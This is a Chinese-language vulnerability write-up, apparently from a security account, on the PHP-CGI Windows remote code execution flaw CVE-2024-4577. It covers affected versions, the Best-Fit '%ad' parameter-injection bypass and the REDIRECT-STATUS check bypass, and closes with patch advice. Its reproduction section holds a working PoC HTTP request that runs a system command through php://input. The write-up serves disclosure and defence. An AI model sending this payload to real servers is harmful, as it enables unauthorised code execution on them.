漏洞分析|PHP-CGI Windows平台远程代码执行漏洞(CVE-2024-4577)

文摘   2024-06-16 12:12   上海  

1.漏洞描述

CVE-2024-4577导致漏洞产生的本质其实是Windows系统内字符编码转换的Best-Fit特性导致的,相对来说PHP在这个漏洞里更像是一个受害者。

PHP语言在设计时忽略了Windows系统内部对字符编码转换的Best-Fit特性,当PHP运行在Window平台且使用了如繁体中文(代码页950)、简体中文(代码页936)和日文(代码页932)等语系时,威胁者可构造恶意请求绕过CVE-2012-1823的保护,通过参数注入等攻击在目标PHP服务器上远程执行代码。


2.影响版本

PHP 8.3 < 8.3.8

PHP 8.2 < 8.2.20

PHP 8.1 < 8.1.29

该漏洞影响安装于Windows系统上的PHP 版本。由于PHP 8.0 分支、PHP 7 以及PHP 5 官方已不再维护


3.影响范围


4.漏洞复现

POST /php-cgi/php-cgi.exe?%add+allow_url_include%3d1+%add+auto_prepend_file%3dphp://input%20 HTTP/1.1Host: 127.0.0.1User-Agent: Opera/9.98.(Windows 98; Win 9x 4.90; fur-IT) Presto/2.9.173 Version/11.00Accept-Encoding: gzip, deflateAccept: */*Connection: closeContent-Type: application/x-www-form-urlencodedREDIRECT-STATUS: 1Content-Length: 22
<?php system("dir");?>


5.漏洞分析

看看漏洞利用条件

首先得是Window环境

漏洞是由于Windows系统内字符编码转换的Best-Fit特性导致得所以必须是windows环境,其他不影响

然后由于这个特性,windows正在使用的语言系统是以下三种

繁体中文 (字码页 950)

简体中文 (字码页 936)

日文 (字码页 932)

poc中用到得特殊字符是%ad,看看%ad是什么

/php-cgi/php-cgi.exe?%add+allow_url_include%3d1+%add+auto_prepend_file%3dphp://input

编码转换的Best-Fit特性会将"%ad "转换成"-"

"-"发挥得作用是什么,我们看看源码

在新的commit当中还加入了对0x80以上的所有字符的限制来修复这个问题,原本代码中就过滤了"-"符号

上面还有一段注释

如果get发送的请求字符串中不包含=”,那么Apache就会把请求传到命令行作为cgi的参数。但这会导致恶意请求就可以将命令行参数传递给php,如果直接处理传参,那么会影响到以独立脚本方式运行的PHP脚本。所以只有当开头是-的时候(跳过所有空白符号)才阻止传递参数。

也就是说这个漏洞是绕过CVE-2012-1823的限制

利用Best-Fit特性会将"%ad "转换成"-",导致参数传递没有被阻止,从而利用漏洞

当目标以以CGI模式运行的PHP环境时,配置如下

## PHP-CGI setup#<FilesMatch "\.php$">SetHandler application/x-httpd-php-cgi</FilesMatch><IfModule actions_module>Action application/x-httpd-php-cgi "/php-cgi/php-cgi.exe"</IfModule>

apache会把请求直接转发给php-cgi。结合上面的特性,你可以通过传%ad来传入一个"-",这样在-之后的部分就会成为php-cgi的参数

httpd-xampp.conf中就可以找到这一串代码

访问/php-cgi/路径的时候,会映射D:/xampp/php/下的文件

只有php-cgi.exe是granted的,我们把视角还是回到php-cgi上。

我们直接访问调用php-cgi.exe会有安全警告

我们看看代码

https://github.com/php/php-src/blob/51379d66ec8732e506c43f6c7f1befc500117ae8/sapi/cgi/cgi_main.c#L1897

PHP增加了一个配置叫做cgi.force_redirect=1,开启了这个选项(默认开启)之后,只有经过重定向的规则请求才能执行,不能直接调用执行。

我们得想办法绕过它才能继续执行

在源码中发现REDIRECT_STATUSHTTP_REDIRECT_STATUS不为空时即可

那我们给REDIRECT-STATUS:1即可绕过这个限制


6.修复建议

目前该漏洞已经修复,受影响用户可升级到PHP版本8.3.8、8.2.20、8.1.29或更高版本。

下载链接:

https://github.com/php/php-src/tags



XDsecurity
玄道网安:网络\x26amp;信息安全资讯分享,公众号内容包括但不限于网络安全内容及其他内容分享,安全业务咨询与交流(直接找玄道),感谢大家关注!
 最新文章